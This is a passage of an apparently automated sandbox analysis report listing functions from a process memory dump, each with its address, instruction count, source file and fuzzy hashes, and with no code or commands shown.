                                                        Function 0199EB50 Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 78fa7be20a68762cf8a2719922b7b92202fc4d48b65431245dcc4ecf4a67aa42
                                                        • Instruction ID: 469aace60068206cdeff2a4288a4f73be24069bec1cba9a507708178d8527a6d
                                                        • Opcode Fuzzy Hash: 78fa7be20a68762cf8a2719922b7b92202fc4d48b65431245dcc4ecf4a67aa42
                                                        • Instruction Fuzzy Hash: 1B01A771284701AFD7329B1ED844F02BBE8EF95B50F014429B20D9F390D6B298808B54
                                                        Function 018F2582 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c492ba378ad25eb3c5984f98a567162d580642baa42306cad0045b2a53c5d825
                                                        • Instruction ID: 5a0db1de6b48284c435dda4f27cf81a1ee0a71343c253b4abe6a0d045c30494f
                                                        • Opcode Fuzzy Hash: c492ba378ad25eb3c5984f98a567162d580642baa42306cad0045b2a53c5d825
                                                        • Instruction Fuzzy Hash: C6F0A932641A25BBC7329B5A8D44F57BAAEEBC4B90F15402DB70AD7650D634EE01CAA0
                                                        Function 0191C073 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                        • Instruction ID: 6b312022759c4212ca273c24fae0725fe1ec87deab902b42dbc9671b4c31212f
                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                        • Instruction Fuzzy Hash: 1AF0C2B2600A15ABE324CF4DDC40E57FBEEDBD1A80F058168E559C7220EA31ED04CB90
                                                        Function 018EC310 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                        • Instruction ID: 6d45ab9c1fd4fe0b298b1844a9be0e1c0d2c381dd1c0d4a2478f7e4060e149ee
                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                        • Instruction Fuzzy Hash: B8F0F673A44A339BD732565D8848B2BAAD59FD3BA8F1A0035E209DB240CB608F0296D1
                                                        Function 019C634F Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 64592149102e78eebeaa7aac373c882ea41c215a3de19829ba3272f5adf0a0d7
                                                        • Instruction ID: 78957962e7174179dd6f51cf39b22b2e31f7c7830e05b3b93cf9d384dc95b438
                                                        • Opcode Fuzzy Hash: 64592149102e78eebeaa7aac373c882ea41c215a3de19829ba3272f5adf0a0d7
                                                        • Instruction Fuzzy Hash: DF014F71E1020AEFDB04DFA9D551AAEB7F8FF98704F10406AF905EB391D674DA018BA1
                                                        Function 019C62D6 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc2b234e5eb0e4ce504919f97bf603e5374d1e2a6b9cf41b7f6b9ac5d17da5bc
                                                        • Instruction ID: c419c61e8dcd891f4178ad68886b1832900e8901113eb089962efac303e2eb32
                                                        • Opcode Fuzzy Hash: fc2b234e5eb0e4ce504919f97bf603e5374d1e2a6b9cf41b7f6b9ac5d17da5bc
                                                        • Instruction Fuzzy Hash: 98017171A00209AFCB00DFA9D44199EB7F8EF98700F50401AE904E7391D6749A008BA0
                                                        Function 019C625D Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 899d04bc0dfcedb6d4100d3a38899528ee9098d23e1270cad1f84a08cd3effa8
                                                        • Instruction ID: 1dc31d094db76b9202bdf47c843daf24e86287e3647bdcf92420301e75b33ba8
                                                        • Opcode Fuzzy Hash: 899d04bc0dfcedb6d4100d3a38899528ee9098d23e1270cad1f84a08cd3effa8
                                                        • Instruction Fuzzy Hash: 63012171A1021AAFCB04DFA9D5519AEB7F8EF98704F10405AF905E7391D6749A018BA1
                                                        Function 019C61E5 Relevance: .0, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4b1ac8ba9e8d4bee69f955798bee16032adb764f9661d1724fa4b1431eb94b0
                                                        • Instruction ID: a0cf5e0f4eb85ce23826da88c6d92cbb4e741cd988dc167689a4564717c3469a
                                                        • Opcode Fuzzy Hash: d4b1ac8ba9e8d4bee69f955798bee16032adb764f9661d1724fa4b1431eb94b0
                                                        • Instruction Fuzzy Hash: AE018F71A002499FCB00DFA9D441AEEBBF8BF98710F14006EE505EB380D734EA01CB95
                                                        Function 019763C0 Relevance: .0, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                        • Instruction ID: 560de11d4da2af45a9ccefa5caaf82487c952075a6a2be9133bc79bfa5078004
                                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                        • Instruction Fuzzy Hash: 58F01D7220001DBFEF029F95DD80DAF7B7EFF996D8B104125FA15A2160D631DE21ABA0
                                                        Function 0197A4B0 Relevance: .0, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c99bd86e8d9e014de96e0c3cf776570c3617e8ed7357c4012e605d442e07efd1
                                                        • Instruction ID: 6b876a50417e539fd47016299b5acc72c058f093cdda45929b1cefa9cce28881
                                                        • Opcode Fuzzy Hash: c99bd86e8d9e014de96e0c3cf776570c3617e8ed7357c4012e605d442e07efd1
                                                        • Instruction Fuzzy Hash: 8F018936200109ABCF129F84D840EDE3FA6FF4C654F0A8105FE1866260C332D970EB81
                                                        Function 018EC0F0 Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f8163f806376fa4cd0d832f26a65377d4ae3980ce95af9cb191448ada7200573
                                                        • Instruction ID: 769199b16bb8b9df570f4acf69e25468c28277a2dd27130579457ccc797b5ba2
                                                        • Opcode Fuzzy Hash: f8163f806376fa4cd0d832f26a65377d4ae3980ce95af9cb191448ada7200573
                                                        • Instruction Fuzzy Hash: 64F02471A146415BF324961D8C05F3232D6E7D2B50F25806EEB09CB2C1FB71DE018794
                                                        Function 0192656A Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 33a9c44df8fc3843fb3dfcadbee3c3fd2bf9dfe06e6ad23a4449bde3c4652bad
                                                        • Instruction ID: 5c0c53c3cb869eab4a30efa49cf4ef9484eff3e7bd044eec3612127a6c0610ea
                                                        • Opcode Fuzzy Hash: 33a9c44df8fc3843fb3dfcadbee3c3fd2bf9dfe06e6ad23a4449bde3c4652bad
                                                        • Instruction Fuzzy Hash: 71018C70204A869FF3239B6CCD48F293BECBB91B44F480590FA098BADAD728D441C620
                                                        Function 0199437C Relevance: .0, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                        • Instruction ID: ca1c1191898942be32575c4c93f9f731a175f2e791adfb2e45625d1f00204ea1
                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                        • Instruction Fuzzy Hash: B7F0E93138191347EF37AA3E8721B2AAA999FD0A03B06452C994ECB680DF61DC4287C0
                                                        Function 0197C89D Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 43918fcf52b75215c8c60bd3ad8b712a2bb873db9437f06f856b2c83d765d84e
                                                        • Instruction ID: 423ee713acfb2a9cd11eccf7808aac2788efba9ff781d42a275ff24a237e89f5
                                                        • Opcode Fuzzy Hash: 43918fcf52b75215c8c60bd3ad8b712a2bb873db9437f06f856b2c83d765d84e
                                                        • Instruction Fuzzy Hash: 40F0C2716093459FC310EF28C542E1BB7E4FF98710F40465AB898DB390E634EA00CB96
                                                        Function 0197E872 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                        • Instruction ID: a4f3b52c7391a6b7b14c7ed352c2478944b4273c416a34b5dcd7a5d75568c4f4
                                                        • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                        • Instruction Fuzzy Hash: 05F08233B11A229FE3319A4ECC80F56B7ACEFD5A60F1904A5AA0CDB260C760EC01C7D1
                                                        Function 01920854 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                        • Instruction ID: 12ccc61c4d11dd050f5004d5d75ed5a90ff2ed0ee5007a457cab65cb092faeb8
                                                        • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                        • Instruction Fuzzy Hash: D8F02E72600204AFE324DB25CC04F97B6E9FFA8300F188078E948C72A4FAF1EE00C695
                                                        Function 0197C912 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 90ad7def7470116d078a845ca93d48b186f4147f32a84cc2d9d63fba5ef9cae3
                                                        • Instruction ID: ce1293350f09dc2e5481456d5558dee423d0631ca43949513cb4224a305c85a5
                                                        • Opcode Fuzzy Hash: 90ad7def7470116d078a845ca93d48b186f4147f32a84cc2d9d63fba5ef9cae3
                                                        • Instruction Fuzzy Hash: F1F04F70A0124AAFCB04EF69D515A9EB7B4EF58300F008055B959EB385DA38EA01CB50
                                                        Function 018F47FB Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6d3213ccbbea177233100a9daf48dbc65e43911cf87ea43be38c15205975efc
                                                        • Instruction ID: ee2911f3c35ddfe0c669cef028b8856cdf2463201a67b6be0bb6bcf0293e7e02
                                                        • Opcode Fuzzy Hash: f6d3213ccbbea177233100a9daf48dbc65e43911cf87ea43be38c15205975efc
                                                        • Instruction Fuzzy Hash: 8BF0FA319222E48EE7228B2CC444B73BBC49B08B34F08886FC789C3502C324DA80C640
                                                        Function 019B0115 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9fdb528441bac1e5293a6be2b3207a6bcf49d85d53512527901ee3f59b35434d
                                                        • Instruction ID: 2ba9e53d271aabd58e39216daf38642c7b50a22e0edaf4f38e96decc97f89b64
                                                        • Opcode Fuzzy Hash: 9fdb528441bac1e5293a6be2b3207a6bcf49d85d53512527901ee3f59b35434d
                                                        • Instruction Fuzzy Hash: D1F027764196804ACB376B2CA6D02D66FF8B7A2120F4D1089D4A85B206C5788483C760
                                                        Function 0192C5ED Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c60c2e27c29016b5f8c128f652cdec2715bda6d03bd43fac422fda2e773e0a42
                                                        • Instruction ID: cf83db8917f6afb9da523b86447330c6c5806b01ece3608b6aa50ffffb4dc2ac
                                                        • Opcode Fuzzy Hash: c60c2e27c29016b5f8c128f652cdec2715bda6d03bd43fac422fda2e773e0a42
                                                        • Instruction Fuzzy Hash: AAF0E2715516779FE332971CC148B1D7BDC9B40BA6F099826D50EC7656C3A4F880CA61
                                                        Function 01932619 Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                        • Instruction ID: c81670db9c946ae7e7f49bb3fbc39d0b790c91f5fd6df6f329cd28e555ed5101
                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                        • Instruction Fuzzy Hash: D9E020323006012BE7129F59CCC4F47776EDFD2B14F05007EB5085F291C9E2DC0986A4
                                                        Function 01986030 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                        • Instruction ID: 8850a7412abbbdc79dae036d0de0fcf3abc4114687b73f1e2413358cf712566c
                                                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                        • Instruction Fuzzy Hash: 6BF03072104204AFE3219F0AD944F62BBF9EB45365F46C425E60D9F561D37AEC41CBA8
                                                        Function 018F0710 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                        • Instruction ID: 61bc410a6a475f1c1be638e5588c3e3eaa9b07f2ab7c1d3c561869f568121659
                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                        • Instruction Fuzzy Hash: 40F0E539204345DFDB16CF1AC040A957BA9FB51350B004099F94ACB342D736EA81CB94
                                                        Function 019249D0 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                        • Instruction ID: 7d9d7ab15d89b5e9165b90eb09f5a8109d60c7d01834baf55cb9faa2bed862ea
                                                        • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                        • Instruction Fuzzy Hash: DEE0D832245155AFD3211A598800F6A77A9DBD07A1F160429E24C8B154DBB0DC40C7D8
                                                        Function 019C4164 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b581d373f8b4f395ce655c4cdd9638573c9f52da9ec11eeb144789a33a09dcb0
                                                        • Instruction ID: 13755823358d8ef72029b1f2301e6005e639501ca8c1d0cccd65cdd79bf40080
                                                        • Opcode Fuzzy Hash: b581d373f8b4f395ce655c4cdd9638573c9f52da9ec11eeb144789a33a09dcb0
                                                        • Instruction Fuzzy Hash: 89F0A031B255918FEB62D728D1A4B5177E8BBB0E21F4A0568D4C887912C320EC40C751
                                                        Function 0199678E Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                        • Instruction ID: 2679d266d8b5f064403f09a934eb3f2bdd39dd006439564e454d8c32999d3a83
                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                        • Instruction Fuzzy Hash: 41E0DF32A40224FBEF22A7998D05F9ABEBCDB90EA0F050054B608E71E0E530EE00C690
                                                        Function 019C08C0 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                        • Instruction ID: e78d226c6d3cebfde2d68bb172be507c8af7e7183da5a62941971de5f96e9770
                                                        • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                        • Instruction Fuzzy Hash: 5DE06535640350CBCB258A19C140A53B7ACDF95A61F19C06DE98D47612C232E842C692
                                                        Function 018F25E0 Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 5fe7a6565755291adfc3ac4fa6eb9f425a7122637b8af46ed56f7beb44a6898e
                                                        • Instruction ID: 9a7cc5ad56ad1b54347ec4f9ee2215454924517cd70ca6a326bcb521b76a0088
                                                        • Opcode Fuzzy Hash: 5fe7a6565755291adfc3ac4fa6eb9f425a7122637b8af46ed56f7beb44a6898e
                                                        • Instruction Fuzzy Hash: E4E092321109549BC722BB29DD01F8B77AAEBA0764F014529B119971A0CB34A910C794
                                                        Function 019AA456 Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                        • Instruction ID: 292013e3c4ff11a666dbf8c847e6c234340fa864c571bf83a857c7973cd1e2a9
                                                        • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                        • Instruction Fuzzy Hash: 1BE01231010A51DFE7366F2AD948B567AE5BF90B52F548C2DE19E124B0C775D8C5CA80
                                                        Function 01974000 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                        • Instruction ID: e40f19f43a87d79d5d7463433649a32b0f5e13294e3ab8b5d78bc4cf4dd05228
                                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                        • Instruction Fuzzy Hash: F2E0C2343003058FE716CF19C040B667BBABFD5A11F28C068A9488F206EB32E842CB40
                                                        Function 018E823B Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                        • Instruction ID: 65ca1df45768d2b133930e25bd9cc80d0ab8bcc216e09530908cbc9a5a1b5a6e
                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                        • Instruction Fuzzy Hash: A8E0C232440A24EFDB322F15DC04F5577F5FFD7B11F204829E08A460A48770AD81DB44
                                                        Function 018F2050 Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 26004f5a0d524840c5a8b7efb19eeee3c922f176ef2a0a9d576757ca26d866ec
                                                        • Instruction ID: dca3545904284160c413d7ef8e0b23b473da6fb4c968392ebc57257c3a0a3c46
                                                        • Opcode Fuzzy Hash: 26004f5a0d524840c5a8b7efb19eeee3c922f176ef2a0a9d576757ca26d866ec
                                                        • Instruction Fuzzy Hash: 6FE08C322104606BC612FA5DDD00E4A739AEBA4760F000125B2548B2E0CA24AE00C794
                                                        Function 01928A90 Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
